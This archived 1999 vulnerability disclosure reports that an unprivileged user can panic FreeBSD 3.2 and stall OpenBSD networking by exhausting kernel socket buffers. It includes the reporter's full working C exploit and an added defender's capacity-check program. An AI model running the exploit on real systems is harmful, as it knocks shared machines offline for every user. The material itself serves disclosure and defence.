BSD_local_DoS.txt

19 Sep 1999. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

Local denial of service attack on FreeBSD and OpenBSD by unprivileged user using socket options.

Code
`Subject: Local DoS on network by unprivileged user using setsockopt()  
To: [email protected]   
  
  
Recently, I mailed this mailing to a number of people who are concerned  
with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The  
mailing was NOT intended to be made public, but somehow it was. Here is  
my original mailing:  
  
  
  
--- Forwarded ---  
  
  
I stumbled across a denial of service attack on FreeBSD systems, where  
an unprivileged user can panic the kernel. Quick and dirty testing  
(code attached at the end of this mail) showed OpenBSD is vulnerable  
too:  
  
  
FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to  
test it on older FreeBSD versions.  
  
  
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:  
The kernel logs one "/bsd: mb_map full" and all processes trying to send  
something over the network get stuck waiting in mbuf. Locally the system  
continues to function. Tested by a friend.  
  
  
NetBSD: Not available, but it is highly probable that the affected code  
in OpenBSD is from its parent NetBSD.  
  
  
As far as I'm concerned, this can be handled quietly and without much  
haste. Knowledge of this problem is limited and there is absolutely no  
intention of publishing this exploit or messages to Bugtraq.  
  
  
With kind regards,  
Sven Berkvens ([email protected])  
Long time FreeBSD-system administrator  
  
  
  
  
The source code for the program that causes this:  
  
  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <fcntl.h>  
  
#define BUFFERSIZE 204800  
  
int  
main(void)  
{  
    int p[2], i;  
    char crap[BUFFERSIZE];  
  
    /* Runs until socketpair() fails; descriptors are never closed. */  
    while (1)  
    {  
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)  
            break;  
        /* Raise both buffers on both ends to BUFFERSIZE. */  
        i = BUFFERSIZE;  
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));  
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));  
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));  
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));  
        /* Non-blocking, so write() returns once the buffer is full. */  
        fcntl(p[0], F_SETFL, O_NONBLOCK);  
        fcntl(p[1], F_SETFL, O_NONBLOCK);  
        /* The data is never read, so it stays queued in the kernel. */  
        write(p[0], crap, BUFFERSIZE);  
        write(p[1], crap, BUFFERSIZE);  
    }  
    exit(0);  
}  
  
  
----- End forwarded message -----  
`
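
A defender's view of the mail above, as an added example (not part of the original posting or of any BSD project's code): a simplified capacity check that compares what one process can leave queued in socket buffers against the mbuf cluster pool. It uses the mail's 204800-byte buffer size and 8192-cluster figure; the 2048-byte cluster size, the function names, and the use of `RLIMIT_SBSIZE` (a cumulative socket-buffer limit that some BSDs, FreeBSD among them, define) are assumptions.

```c
#include <limits.h>
#include <stdio.h>
#include <sys/resource.h>

/* Assumption: 2048-byte mbuf clusters; check MCLBYTES on the audited system. */
#define CLUSTER_BYTES 2048UL

/* Upper bound on bytes one process can leave queued in socket buffers:
 * every descriptor is a socket filled to sockbuf_bytes. A cumulative
 * cap (sbsize_cap, 0 = no cap) bounds the total. Saturates on overflow. */
unsigned long worst_case_bytes(unsigned long nofile,
                               unsigned long sockbuf_bytes,
                               unsigned long sbsize_cap)
{
    unsigned long total = (sockbuf_bytes && nofile > ULONG_MAX / sockbuf_bytes)
                          ? ULONG_MAX : nofile * sockbuf_bytes;
    return (sbsize_cap != 0 && sbsize_cap < total) ? sbsize_cap : total;
}

/* Socket pairs (two full buffers each) that cover the whole cluster pool. */
unsigned long pairs_to_fill(unsigned long nclusters, unsigned long sockbuf_bytes)
{
    unsigned long per_pair = 2 * sockbuf_bytes;
    return (nclusters * CLUSTER_BYTES + per_pair - 1) / per_pair;
}

/* 1 if a single process's worst case reaches the size of the pool. */
int pool_exhaustible(unsigned long nofile, unsigned long sockbuf_bytes,
                     unsigned long sbsize_cap, unsigned long nclusters)
{
    return worst_case_bytes(nofile, sockbuf_bytes, sbsize_cap)
           >= nclusters * CLUSTER_BYTES;
}

int main(void)
{
    struct rlimit rl;
    unsigned long nofile = 64, cap = 0;   /* used only if getrlimit() fails */

    if (getrlimit(RLIMIT_NOFILE, &rl) == 0)
        nofile = (unsigned long)rl.rlim_cur;      /* unlimited saturates above */
#ifdef RLIMIT_SBSIZE                              /* defined on some BSDs only */
    if (getrlimit(RLIMIT_SBSIZE, &rl) == 0 && rl.rlim_cur != RLIM_INFINITY)
        cap = (unsigned long)rl.rlim_cur;
#endif
    /* 204800 and 8192: buffer size and cluster count taken from the mail. */
    printf("nofile=%lu sbsize_cap=%lu pairs_to_fill=%lu exhaustible=%d\n",
           nofile, cap, pairs_to_fill(8192, 204800),
           pool_exhaustible(nofile, 204800, cap, 8192));
    return 0;
}
```

An `exhaustible=1` result means the descriptor limit alone does not bound socket-buffer memory for that account; a cumulative buffer cap or a lower descriptor limit does.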
